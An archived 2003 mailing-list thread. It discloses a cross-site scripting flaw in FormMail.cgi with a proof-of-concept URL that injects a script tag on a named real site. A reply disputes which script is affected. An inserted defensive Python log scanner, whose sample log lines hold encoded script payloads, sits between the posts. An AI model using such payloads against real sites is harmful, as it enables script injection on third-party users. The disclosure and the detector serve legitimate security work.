
View Full Version : XSS (Cross Site Scripting) on FormMail.CGI



Rynho Zeros Web
21/01/03, 03:54
################################################## ###########

Topic: XSS (Cross Site Scripting) on FormMail.CGI
Version: 1.92
Released: April 21, 2002
Manufacturer: http://www.scriptarchive.com/formmail.html

By XyborG - xyborg@bigfoot.com - http://www.rzweb.com.ar/

################################################## ###########


FormMail.cgi is a utility that serves to send forms by email, among other
uses.

The operation is simple. See this example:


http://www.l-c-u.com.ar/cgi-sys/FormMail.cgi?<script>alert("<center>Sorry,this\nis\nthe\nsecurity\nsite?\nNo_lo_Creo\n \nCyervo_Lamos...");</script>

Duh!


--
XyBØrG
WebMaster of:
www.RZW.com.ar
Powered By Dattatec.Com
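
Added example, not part of the original post or of any FormMail code: a defender-side check that scans web server access logs for the kind of request shown above, where HTML markup arrives in the query string of FormMail.cgi. The log lines are constructed samples, and the script names in `SCRIPT_RE` and the three-round decoding limit are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Request field of a Common/Combined Log Format line. The target is matched
# lazily up to the protocol token so raw spaces or quotes inside it survive.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/\d\.\d"')
# Script names to watch (assumption: FormMail installed under its usual names).
SCRIPT_RE = re.compile(r"/formmail\.(?:cgi|pl)$", re.IGNORECASE)
# Start of an HTML tag, closing tag or comment in the decoded query string.
MARKUP_RE = re.compile(r"<\s*[a-z/!]", re.IGNORECASE)

# Constructed sample lines (documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jan/2003:03:50:01 +0000] "GET /cgi-sys/FormMail.cgi?%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.0" 200 512',
    '192.0.2.11 - - [21/Jan/2003:03:51:07 +0000] "GET /cgi-sys/FormMail.cgi?recipient=a%40example.test&subject=hi HTTP/1.0" 200 300',
    '192.0.2.12 - - [21/Jan/2003:03:52:19 +0000] "GET /cgi-sys/formmail.cgi?%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 512',
    '192.0.2.13 - - [21/Jan/2003:03:53:40 +0000] "GET /index.html?q=%3Cb%3E HTTP/1.1" 200 99',
    '192.0.2.14 - - [21/Jan/2003:03:54:02 +0000] "POST /cgi-sys/FormMail.cgi HTTP/1.1" 200 10',
]

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup is also exposed."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_formmail_markup(log_lines):
    """Return (line number, client, decoded query) for suspicious requests."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group("target").partition("?")
        if not SCRIPT_RE.search(decode_fully(path)):
            continue  # some other resource, not the form mailer
        decoded = decode_fully(query)
        if MARKUP_RE.search(decoded):
            hits.append((lineno, line.split(" ", 1)[0], decoded))
    return hits

if __name__ == "__main__":
    for lineno, client, query in find_formmail_markup(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent markup in query: {query!r}")
```

A hit only shows that markup was sent; whether the installed script reflects it unescaped still has to be checked against the response it returns.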


Scott Buchanan
23/01/03, 02:00
According to the script at: http://www.l-c-u.com.ar/cgi-sys/FormMail.cgi
which says:

FormMail-Clone
This is FormMail-clone, a clone of FormMail.cgi. It is a clean room version
for legal purposes (a less restrictive liscense), but should behave the
exact same way as Matt Wright's Original, but contain none of his code.

it isn't the same script as: http://www.scriptarchive.com/formmail.html


It is nice to see that Matt Wright has finally updated FormMail to be less
SPAM friendly, but there have been a few more secure alternatives around
for a while - there's even a link to 'NMS' FormMail on the Script Archive page.

Rynho Zeros Web wrote:
> ################################################## ###########
>
> Topic: XSS (Cross Site Scripting) on FormMail.CGI
> Version: 1.92
> Released: April 21, 2002
> Manufacturer: http://www.scriptarchive.com/formmail.html
>
> By XyborG - xyborg@bigfoot.com - http://www.rzweb.com.ar/
>
> ################################################## ###########
>
>
> FormMail.cgi is a utility that serves to send forms by email, among other
> uses.
>
> The operation is simple. See this example:
>
>
> http://www.l-c-u.com.ar/cgi-sys/FormMail.cgi?<script>alert("<center>Sorry,this\nis\nthe\nsecurity\nsite?\nNo_lo_Creo\n \nCyervo_Lamos...");</script>
>
> Duh!
>
>


--
regards,

scott buchanan / systems engineer
scott.buchanan@axegroup.com.au
axe group 51a hume street crows nest nsw 2065 australia
abn 62 095 107 814 t +61 2 9966 9336
f +61 2 9966 9337
